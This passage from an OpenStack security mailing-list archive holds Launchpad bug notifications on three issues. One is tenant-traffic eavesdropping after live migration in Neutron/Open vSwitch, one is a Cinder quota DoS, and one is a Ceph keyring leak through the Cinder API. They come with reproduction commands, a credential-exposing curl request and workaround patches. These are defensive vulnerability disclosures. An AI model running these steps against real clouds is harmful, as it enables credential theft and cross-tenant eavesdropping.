network2=192.168.80.14 | | name | instance_temp | +-----------+-----------------------------------------------------------------------------+ 4. Ssh to the instance using network1 and run a tcpdump on the other port network2 [root at instance_temp]$ tcpdump -eeenni eth1 5. Get port-id of network2 admin$ nova interface-list fe28a2ee-098f-4425-9d3c-8e2cd383547d +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | Port State | Port ID | Net ID | IP addresses | MAC Addr | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | ACTIVE | a848520b-0814-4030-bb48-49e4b5cf8160 | d69028f7-9558-4f14-8ce6-29cb8f1c19cd | 192.168.80.14 | fa:16:3e:2d:8b:7b | | ACTIVE | fad148ca-cf7a-4839-aac3-a2cd8d1d2260 | d22c22ae-0a42-4e3b-8144-f28534c3439a | 192.168.99.8 | fa:16:3e:60:2c:fa | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ 6. Force port down on network 2 admin$ neutron port-update a848520b-0814-4030-bb48-49e4b5cf8160 --admin-state-up False 7. Port gets tagged with vlan 4095, the dead vlan tag, which is normal: compute1# grep a848520b-0814-4030-bb48-49e4b5cf8160 /var/log/neutron/neutron-openvswitch-agent.log | tail -1 INFO neutron.plugins.ml2.drivers.openvswitch.agent.ovs_neutron_agent [req-e008feb3-8a35-4c97-adac-b48ff88165b2 - - - - -] VIF port: a848520b-0814-4030-bb48-49e4b5cf8160 admin state up disabled, putting on the dead VLAN 8. Verify the port is tagged with vlan 4095 compute1# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           tag: 4095           Interface "qvoa848520b-08" 9. Now live-migrate the instance: admin# nova live-migration fe28a2ee-098f-4425-9d3c-8e2cd383547d 10. Verify the tag is gone on compute2, and take a deep breath compute2# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           Interface "qvoa848520b-08"       Port... compute2# echo "Wut!" 11. Now traffic of all other self-service networks present on compute2 can be sniffed from instance_temp [root at instance_temp] tcpdump -eenni eth1 13:14:31.748266 fa:16:3e:6a:17:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.152, length 28 13:14:31.804573 fa:16:3e:e8:a2:d2 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.70, length 28 13:14:31.810482 fa:16:3e:95:ca:3a > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.154, length 28 13:14:31.977820 fa:16:3e:6f:f4:9b > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.150, length 28 13:14:31.979590 fa:16:3e:0f:3d:cc > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 9, p 0, ethertype ARP, Request who-has 10.103.9.163 tell 10.103.9.1, length 28 13:14:32.048082 fa:16:3e:65:64:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.101, length 28 13:14:32.127400 fa:16:3e:30:cb:b5 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.165, length 28 13:14:32.141982 fa:16:3e:96:cd:b0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.100, length 28 13:14:32.205327 fa:16:3e:a2:0b:76 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.153, length 28 13:14:32.444142 fa:16:3e:1f:db:ed > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 72, p 0, ethertype IPv4, 192.168.99.212 > 224.0.0.18: VRRPv2, Advertisement, vrid 50, prio 103, authtype none, intvl 1s, length 20 13:14:32.449497 fa:16:3e:1c:24:c0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.20, length 28 13:14:32.476015 fa:16:3e:f2:3b:97 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.22, length 28 13:14:32.575034 fa:16:3e:44:fe:35 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.163, length 28 13:14:32.676185 fa:16:3e:1e:92:d7 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.150, length 28 13:14:32.711755 fa:16:3e:99:6c:c8 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 62: vlan 10, p 0, ethertype IPv4, 10.103.12.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 2, prio 49, authtype simple, intvl 1s, length 24 13:14:32.711773 fa:16:3e:f5:23:d5 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 12, p 0, ethertype IPv4, 10.103.15.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 49, authtype simple, intvl 1s, length 20 Workaround ---------- We temporary fixed this issue by forcing the dead vlan tag on port creation on compute nodes: /usr/lib/python2.7/site-packages/vif_plug_ovs/linux_net.py: def _create_ovs_vif_cmd(bridge, dev, iface_id, mac,                         instance_id, interface_type=None,                         vhost_server_path=None): + # ODCN: initialize port as dead + # ODCN: TODO: set drop flow     cmd = ['--', '--if-exists', 'del-port', dev, '--',             'add-port', bridge, dev, + 'tag=4095',             '--', 'set', 'Interface', dev,             'external-ids:iface-id=%s' % iface_id,             'external-ids:iface-status=active',             'external-ids:attached-mac=%s' % mac,             'external-ids:vm-uuid=%s' % instance_id]     if interface_type:         cmd += ['type=%s' % interface_type]     if vhost_server_path:         cmd += ['options:vhost-server-path=%s' % vhost_server_path]     return cmd https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995     def port_dead(self, port, log_errors=True):         '''Once a port has no binding, put it on the "dead vlan".         :param port: an ovs_lib.VifPort object.         '''         # Don't kill a port if it's already dead         cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",                                          log_errors=log_errors) + # ODCN GM 20170915 + if not cur_tag: + LOG.error('port_dead(): port %s has no tag', port.port_name) + # ODCN AJS 20170915 + if not cur_tag or cur_tag != constants.DEAD_VLAN_TAG: - if cur_tag and cur_tag != constants.DEAD_VLAN_TAG:            LOG.info('port_dead(): put port %s on dead vlan', port.port_name)            self.int_br.set_db_attribute("Port", port.port_name, "tag",                                          constants.DEAD_VLAN_TAG,                                          log_errors=log_errors)             self.int_br.drop_port(in_port=port.ofport) plugins/ml2/drivers/openvswitch/agent/openflow/ovs_ofctl/ovs_bridge.py     def drop_port(self, in_port): + # ODCN AJS 20171004: - self.install_drop(priority=2, in_port=in_port) + self.install_drop(priority=65535, in_port=in_port) Regards, ODC Noord. Gerhard Muntingh Albert Siersema Paul Peereboom To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1734320/+subscriptions From smooney at redhat.com Thu Oct 24 13:10:14 2019 From: smooney at redhat.com (sean mooney) Date: Thu, 24 Oct 2019 13:10:14 -0000 Subject: [Openstack-security] [Bug 1734320] Re: Eavesdropping private traffic References: <151152217834.14483.1577991310209811902.malonedeb@soybean.canonical.com> Message-ID: <157192261442.2795.6502369911087612363.malone@gac.canonical.com> yes so as i commented before the issue is here https://review.opendev.org/#/c/640258/15/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_dvr_neutron_agent.py at 404 We are not reading the correct field so once we fix that we expect it to work in the dvr case. that is noted in the Gerrit review. the failures are all cased by the fact we try to read a filed that does not exist this raise an error and the port does not become acitve. we the reach the timout on the nova side and role back the vm. it is not an error for a port to have -1 on the ovs side. that is what we want to allow. a ofport id of -1 mean the port is declare in the control plane e.g. in the ovs-db but has not yet been attach to the data plane. when the tap deive is actully created in the kernel it will automaticaly be added to the ovs dataplane and a ofport id will be assigned. so do be clear we expect ove to assing a port id of -1 and it may also raise a waring in the ovs-db but that is normal and the intended behavior. this is what happens with vhost-user by the way as the ofport id does not get asigned until the vm startrs and until that point it will have a ofportid of -1 not [] -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1734320 Title: Eavesdropping private traffic Status in neutron: Fix Committed Status in OpenStack Compute (nova): In Progress Status in os-vif: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Eavesdropping private traffic ============================= Abstract -------- We've discovered a security issue that allows end users within their own private network to receive from, and send traffic to, other private networks on the same compute node. Description ----------- During live-migration there is a small time window where the ports of instances are untagged. Instances have a port trunked to the integration bridge and receive 802.1Q tagged private traffic from other tenants. If the port is administratively down during live migration, the port will remain in trunk mode indefinitely. Traffic is possible between ports is that are administratively down, even between tenants self-service networks. Conditions ---------- The following conditions are necessary. * Openvswitch Self-service networks * An Openstack administrator or an automated process needs to schedule a Live migration We tested this on newton. Issues ------ This outcome is the result of multiple independent issues. We will list the most important first, and follow with bugs that create a fragile situation. Issue #1 Initially creating a trunk port When the port is initially created, it is in trunk mode. This creates a fail-open situation. See: https://github.com/openstack/os-vif/blob/newton-eol/vif_plug_ovs/linux_net.py#L52 Recommendation: create ports in the port_dead state, don't leave it dangling in trunk-mode. Add a drop-flow initially. Issue #2 Order of creation. The instance is actually migrated before the (networking) configuration is completed. Recommendation: wait with finishing the live migration until the underlying configuration has been applied completely. Issue #3 Not closing the port when it is down. Neutron calls the port_dead function to ensure the port is down. It sets the tag to 4095 and adds a "drop" flow if (and only if) there is already another tag on the port. The port_dead function will keep untagged ports untagged. https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995 Recommendation: Make port_dead also shut the port if no tag is found. Log a warning if this happens. Issue #4 Putting the port administratively down actually puts the port on a compute node shared vlan Instances from different projects on different private networks can talk to each other if they put their ports down. The code does install an openflow "drop" rule but it has a lower priority (2) than the allow rules. Recommendation: Increase the port_dead openflow drop rule priority to MAX Timeline --------  2017-09-14 Discovery eavesdropping issue  2017-09-15 Verify workaround.  2017-10-04 Discovery port-down-traffic issue  2017-11-24 Vendor Disclosure to Openstack Steps to reproduce ------------------ 1. Attach an instance to two networks: admin$ openstack server create --nic net-id= --nic net-id = --image --flavor instance_temp 2. Attach a FIP to the instance to be able to log in to this instance 3. Verify: admin$ openstack server show -c name -c addresses fe28a2ee-098f-4425 -9d3c-8e2cd383547d +-----------+-----------------------------------------------------------------------------+ | Field | Value | +-----------+-----------------------------------------------------------------------------+ | addresses | network1=192.168.99.8, ; network2=192.168.80.14 | | name | instance_temp | +-----------+-----------------------------------------------------------------------------+ 4. Ssh to the instance using network1 and run a tcpdump on the other port network2 [root at instance_temp]$ tcpdump -eeenni eth1 5. Get port-id of network2 admin$ nova interface-list fe28a2ee-098f-4425-9d3c-8e2cd383547d +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | Port State | Port ID | Net ID | IP addresses | MAC Addr | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | ACTIVE | a848520b-0814-4030-bb48-49e4b5cf8160 | d69028f7-9558-4f14-8ce6-29cb8f1c19cd | 192.168.80.14 | fa:16:3e:2d:8b:7b | | ACTIVE | fad148ca-cf7a-4839-aac3-a2cd8d1d2260 | d22c22ae-0a42-4e3b-8144-f28534c3439a | 192.168.99.8 | fa:16:3e:60:2c:fa | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ 6. Force port down on network 2 admin$ neutron port-update a848520b-0814-4030-bb48-49e4b5cf8160 --admin-state-up False 7. Port gets tagged with vlan 4095, the dead vlan tag, which is normal: compute1# grep a848520b-0814-4030-bb48-49e4b5cf8160 /var/log/neutron/neutron-openvswitch-agent.log | tail -1 INFO neutron.plugins.ml2.drivers.openvswitch.agent.ovs_neutron_agent [req-e008feb3-8a35-4c97-adac-b48ff88165b2 - - - - -] VIF port: a848520b-0814-4030-bb48-49e4b5cf8160 admin state up disabled, putting on the dead VLAN 8. Verify the port is tagged with vlan 4095 compute1# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           tag: 4095           Interface "qvoa848520b-08" 9. Now live-migrate the instance: admin# nova live-migration fe28a2ee-098f-4425-9d3c-8e2cd383547d 10. Verify the tag is gone on compute2, and take a deep breath compute2# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           Interface "qvoa848520b-08"       Port... compute2# echo "Wut!" 11. Now traffic of all other self-service networks present on compute2 can be sniffed from instance_temp [root at instance_temp] tcpdump -eenni eth1 13:14:31.748266 fa:16:3e:6a:17:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.152, length 28 13:14:31.804573 fa:16:3e:e8:a2:d2 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.70, length 28 13:14:31.810482 fa:16:3e:95:ca:3a > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.154, length 28 13:14:31.977820 fa:16:3e:6f:f4:9b > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.150, length 28 13:14:31.979590 fa:16:3e:0f:3d:cc > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 9, p 0, ethertype ARP, Request who-has 10.103.9.163 tell 10.103.9.1, length 28 13:14:32.048082 fa:16:3e:65:64:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.101, length 28 13:14:32.127400 fa:16:3e:30:cb:b5 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.165, length 28 13:14:32.141982 fa:16:3e:96:cd:b0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.100, length 28 13:14:32.205327 fa:16:3e:a2:0b:76 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.153, length 28 13:14:32.444142 fa:16:3e:1f:db:ed > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 72, p 0, ethertype IPv4, 192.168.99.212 > 224.0.0.18: VRRPv2, Advertisement, vrid 50, prio 103, authtype none, intvl 1s, length 20 13:14:32.449497 fa:16:3e:1c:24:c0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.20, length 28 13:14:32.476015 fa:16:3e:f2:3b:97 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.22, length 28 13:14:32.575034 fa:16:3e:44:fe:35 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.163, length 28 13:14:32.676185 fa:16:3e:1e:92:d7 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.150, length 28 13:14:32.711755 fa:16:3e:99:6c:c8 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 62: vlan 10, p 0, ethertype IPv4, 10.103.12.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 2, prio 49, authtype simple, intvl 1s, length 24 13:14:32.711773 fa:16:3e:f5:23:d5 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 12, p 0, ethertype IPv4, 10.103.15.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 49, authtype simple, intvl 1s, length 20 Workaround ---------- We temporary fixed this issue by forcing the dead vlan tag on port creation on compute nodes: /usr/lib/python2.7/site-packages/vif_plug_ovs/linux_net.py: def _create_ovs_vif_cmd(bridge, dev, iface_id, mac,                         instance_id, interface_type=None,                         vhost_server_path=None): + # ODCN: initialize port as dead + # ODCN: TODO: set drop flow     cmd = ['--', '--if-exists', 'del-port', dev, '--',             'add-port', bridge, dev, + 'tag=4095',             '--', 'set', 'Interface', dev,             'external-ids:iface-id=%s' % iface_id,             'external-ids:iface-status=active',             'external-ids:attached-mac=%s' % mac,             'external-ids:vm-uuid=%s' % instance_id]     if interface_type:         cmd += ['type=%s' % interface_type]     if vhost_server_path:         cmd += ['options:vhost-server-path=%s' % vhost_server_path]     return cmd https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995     def port_dead(self, port, log_errors=True):         '''Once a port has no binding, put it on the "dead vlan".         :param port: an ovs_lib.VifPort object.         '''         # Don't kill a port if it's already dead         cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",                                          log_errors=log_errors) + # ODCN GM 20170915 + if not cur_tag: + LOG.error('port_dead(): port %s has no tag', port.port_name) + # ODCN AJS 20170915 + if not cur_tag or cur_tag != constants.DEAD_VLAN_TAG: - if cur_tag and cur_tag != constants.DEAD_VLAN_TAG:            LOG.info('port_dead(): put port %s on dead vlan', port.port_name)            self.int_br.set_db_attribute("Port", port.port_name, "tag",                                          constants.DEAD_VLAN_TAG,                                          log_errors=log_errors)             self.int_br.drop_port(in_port=port.ofport) plugins/ml2/drivers/openvswitch/agent/openflow/ovs_ofctl/ovs_bridge.py     def drop_port(self, in_port): + # ODCN AJS 20171004: - self.install_drop(priority=2, in_port=in_port) + self.install_drop(priority=65535, in_port=in_port) Regards, ODC Noord. Gerhard Muntingh Albert Siersema Paul Peereboom To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1734320/+subscriptions From fungi at yuggoth.org Tue Oct 29 15:27:17 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Tue, 29 Oct 2019 15:27:17 -0000 Subject: [Openstack-security] [Bug 1850273] Re: Updating any cinder quota for non-existent project works References: <157234114152.28002.7475267273272586998.malonedeb@chaenomeles.canonical.com> Message-ID: <157236283783.29624.15254229749965649278.malone@soybean.canonical.com> Thanks for the input everyone, from the OpenStack VMT's perspective we'll treat this as a class D report (security hardening opportunity) and not need an advisory. I've ended the embargo and switched the bug to public. https://security.openstack.org/vmt-process.html#incident-report-taxonomy ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - When we try to update a cinder quota for a non-existent project, we get a 200ok response. The non-existent project doesn't get created, but am entry for this project in the quotas table of cinder is made.  PUT /volume/v3//os-quota-sets/ Looks like project validation check is missing in the cinder quota update flow. Due to this flaw, multiple PUT calls on fake project ids might result in filling of quota tables very fast & can be considered a type of DOS attack. ** Changed in: ossa Status: Incomplete => Won't Fix ** Information type changed from Private Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1850273 Title: Updating any cinder quota for non-existent project works Status in Cinder: New Status in OpenStack Security Advisory: Won't Fix Bug description: When we try to update a cinder quota for a non-existent project, we get a 200ok response. The non-existent project doesn't get created, but am entry for this project in the quotas table of cinder is made.  PUT /volume/v3//os-quota-sets/ Looks like project validation check is missing in the cinder quota update flow. Due to this flaw, multiple PUT calls on fake project ids might result in filling of quota tables very fast & can be considered a type of DOS attack. To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1850273/+subscriptions From sean.mcginnis at gmail.com Tue Oct 29 15:51:07 2019 From: sean.mcginnis at gmail.com (Sean McGinnis) Date: Tue, 29 Oct 2019 15:51:07 -0000 Subject: [Openstack-security] [Bug 1850273] Re: Updating any cinder quota for non-existent project works References: <157234114152.28002.7475267273272586998.malonedeb@chaenomeles.canonical.com> Message-ID: <157236427004.28557.7514873272403874851.launchpad@chaenomeles.canonical.com> *** This bug is a duplicate of bug 1307491 *** https://bugs.launchpad.net/bugs/1307491 ** This bug has been marked a duplicate of bug 1307491 quota-update should error out if input provided is non-existent tenant id -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1850273 Title: Updating any cinder quota for non-existent project works Status in Cinder: New Status in OpenStack Security Advisory: Won't Fix Bug description: When we try to update a cinder quota for a non-existent project, we get a 200ok response. The non-existent project doesn't get created, but am entry for this project in the quotas table of cinder is made.  PUT /volume/v3//os-quota-sets/ Looks like project validation check is missing in the cinder quota update flow. Due to this flaw, multiple PUT calls on fake project ids might result in filling of quota tables very fast & can be considered a type of DOS attack. To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1850273/+subscriptions From fungi at yuggoth.org Wed Oct 30 13:25:00 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Wed, 30 Oct 2019 13:25:00 -0000 Subject: [Openstack-security] [Bug 1849624] Re: ceph backend, secret key leak References: <157190672936.29164.18418741485624946377.malonedeb@soybean.canonical.com> Message-ID: <157244190084.18830.5391512076758958351.malone@wampee.canonical.com> Since there were no objections to the revised plan, I've switched the report to public, set the advisory task to won't fix and added a confirmed task for a security note. Thanks! ** Also affects: ossn Importance: Undecided Status: New ** Changed in: ossa Status: Incomplete => Won't Fix ** Changed in: ossn Status: New => Confirmed ** Changed in: ossn Assignee: (unassigned) => Brian Rosmaita (brian-rosmaita) ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - Cinder + ceph backend, secret key leak Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder config files As an authenticated simple user create a cinder volume that ends up on a ceph backend, Then reuse the os.initialize_connection api call (used by nova-compute/cinder-backup to attach volumes locally to the host running the services): curl -g -i -X POST https:///v3/c495530af57611e9bc14bbaa251e1e96/volumes/7e59b91e-d426-4294-bfc5-dfdebcb21879/action \     -H "Accept: application/json" \     -H "Content-Type: application/json" \     -H "OpenStack-API-Version: volume 3.15" \     -H "X-Auth-Token: $TOKEN" \     -d '{"os-initialize_connection": {"connector":{}}}' If you do not want to forge the http request, openstack clients and extensions may prove helpful. As root: apt-get install python3-oslo.privsep virtualenv python3-dev python3-os-brick gcc ceph-common virtualenv -p python3 venv_openstack source venv_openstack/bin/activate pip install python-openstackclient pip install python-cinderclient pip install os-brick pip install python-brick-cinderclient-ext cinder create vol 1 cinder --debug local-attach 7e59b91e-d426-4294-bfc5-dfdebcb21879 This leaks the ceph credentials for the whole ceph cluster, leaving anyone able to go through ceph acls to get access to all the volumes within the cluster. {    "connection_info" : {       "data" : {          "access_mode" : "rw",          "secret_uuid" : "SECRET_UUID",          "cluster_name" : "ceph",          "encrypted" : false,          "auth_enabled" : true,          "discard" : true,          "qos_specs" : {             "write_iops_sec" : "3050",             "read_iops_sec" : "3050"          },          "keyring" : "SECRETFILETOHIDE",          "ports" : [             "6789",             "6789",             "6789"          ],          "name" : "volumes/volume-7e59b91e-d426-4294-bfc5-dfdebcb21879",          "secret_type" : "ceph",          "hosts" : [             "ceph_host1",             "ceph_host2",             ...          ],          "volume_id" : "7e59b91e-d426-4294-bfc5-dfdebcb21879",          "auth_username" : "cinder"       },       "driver_volume_type" : "rbd"    } } Quick workaround: 1. Remove rbd_keyring_conf param from any cinder config file, this will mitigate the information disclosure. 2. For cinder backups to still work, providers should instead deploy their ceph keyring secrets directly on cinder-backup hosts (/etc/cinder/.keyring.conf, to be confirmed). Note that nova-compute hosts should not be impacted by the change, because ceph secrets are expected to be stored in libvirt secrets already, thus making this keyring disclose useless to it. (to be confirmed, there may be other compute drivers that might be impacted by this) Quick code fix: Mandatory: revert this commit https://review.opendev.org/#/c/456672/ Optional: revert this one https://review.opendev.org/#/c/465044/, harmless in itself, but pointless once the first one has been reverted Long term code fix proposals: What the os.initialize_connection api call is meant to: allow simple users to use cinder as block storage as a service in order to attach volumes outside the scope of any virtual machines/nova. Thus, information returned by this call should give enough information for a volume attach to be possible for the caller but they should not disclose anything that would allow him to do more than that. Since it is not possible at all with ceph to do so (no tenant isolation within ceph cluster), the related cinder backend for ceph should not implement this route at all There is indeed no reason why cinder should disclose anything here about ceph cluster, including hosts, cluster-ids, if the attach is doomed to fail for users missing secret informations anyway. Then, any 'admin' service using this call to locally attach the volumes (nova-compute, cinder-backup...) should be modified to: - check caller rw permissions on requested volumes - escalate the request - go through a new admin api route, not this 'user' one ** Information type changed from Private Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1849624 Title: ceph backend, secret key leak Status in Cinder: New Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Security Notes: Confirmed Bug description: Cinder + ceph backend, secret key leak Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder config files As an authenticated simple user create a cinder volume that ends up on a ceph backend, Then reuse the os.initialize_connection api call (used by nova-compute/cinder-backup to attach volumes locally to the host running the services): curl -g -i -X POST https:///v3/c495530af57611e9bc14bbaa251e1e96/volumes/7e59b91e-d426-4294-bfc5-dfdebcb21879/action \     -H "Accept: application/json" \     -H "Content-Type: application/json" \     -H "OpenStack-API-Version: volume 3.15" \     -H "X-Auth-Token: $TOKEN" \     -d '{"os-initialize_connection": {"connector":{}}}' If you do not want to forge the http request, openstack clients and extensions may prove helpful. As root: apt-get install python3-oslo.privsep virtualenv python3-dev python3-os-brick gcc ceph-common virtualenv -p python3 venv_openstack source venv_openstack/bin/activate pip install python-openstackclient pip install python-cinderclient pip install os-brick pip install python-brick-cinderclient-ext cinder create vol 1 cinder --debug local-attach 7e59b91e-d426-4294-bfc5-dfdebcb21879 This leaks the ceph credentials for the whole ceph cluster, leaving anyone able to go through ceph acls to get access to all the volumes within the cluster. {    "connection_info" : {       "data" : {          "access_mode" : "rw",          "secret_uuid" : "SECRET_UUID",          "cluster_name" : "ceph",          "encrypted" : false,          "auth_enabled" : true,          "discard" : true,          "qos_specs" : {             "write_iops_sec" : "3050",             "read_iops_sec" : "3050"          },          "keyring" : "SECRETFILETOHIDE",          "ports" : [             "6789",             "6789",             "6789"          ],          "name" : "volumes/volume-7e59b91e-d426-4294-bfc5-dfdebcb21879",          "secret_type" : "ceph",          "hosts" : [             "ceph_host1",             "ceph_host2",             ...          ],          "volume_id" : "7e59b91e-d426-4294-bfc5-dfdebcb21879",          "auth_username" : "cinder"       },       "driver_volume_type" : "rbd"    } } Quick workaround: 1. Remove rbd_keyring_conf param from any cinder config file, this will mitigate the information disclosure. 2. For cinder backups to still work, providers should instead deploy their ceph keyring secrets directly on cinder-backup hosts (/etc/cinder/.keyring.conf, to be confirmed). Note that nova-compute hosts should not be impacted by the change, because ceph secrets are expected to be stored in libvirt secrets already, thus making this keyring disclose useless to it. (to be confirmed, there may be other compute drivers that might be impacted by this) Quick code fix: Mandatory: revert this commit https://review.opendev.org/#/c/456672/ Optional: revert this one https://review.opendev.org/#/c/465044/, harmless in itself, but pointless once the first one has been reverted Long term code fix proposals: What the os.initialize_connection api call is meant to: allow simple users to use cinder as block storage as a service in order to attach volumes outside the scope of any virtual machines/nova. Thus, information returned by this call should give enough information for a volume attach to be possible for the caller but they should not disclose anything that would allow him to do more than that. Since it is not possible at all with ceph to do so (no tenant isolation within ceph cluster), the related cinder backend for ceph should not implement this route at all There is indeed no reason why cinder should disclose anything here about ceph cluster, including hosts, cluster-ids, if the attach is doomed to fail for users missing secret informations anyway. Then, any 'admin' service using this call to locally attach the volumes (nova-compute, cinder-backup...) should be modified to: - check caller rw permissions on requested volumes - escalate the request - go through a new admin api route, not this 'user' one To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1849624/+subscriptions From rosmaita.fossdev at gmail.com Wed Oct 30 14:56:57 2019 From: rosmaita.fossdev at gmail.com (Brian Rosmaita) Date: Wed, 30 Oct 2019 14:56:57 -0000 Subject: [Openstack-security] [Bug 1849624] Re: ceph backend, secret key leak References: <157190672936.29164.18418741485624946377.malonedeb@soybean.canonical.com> 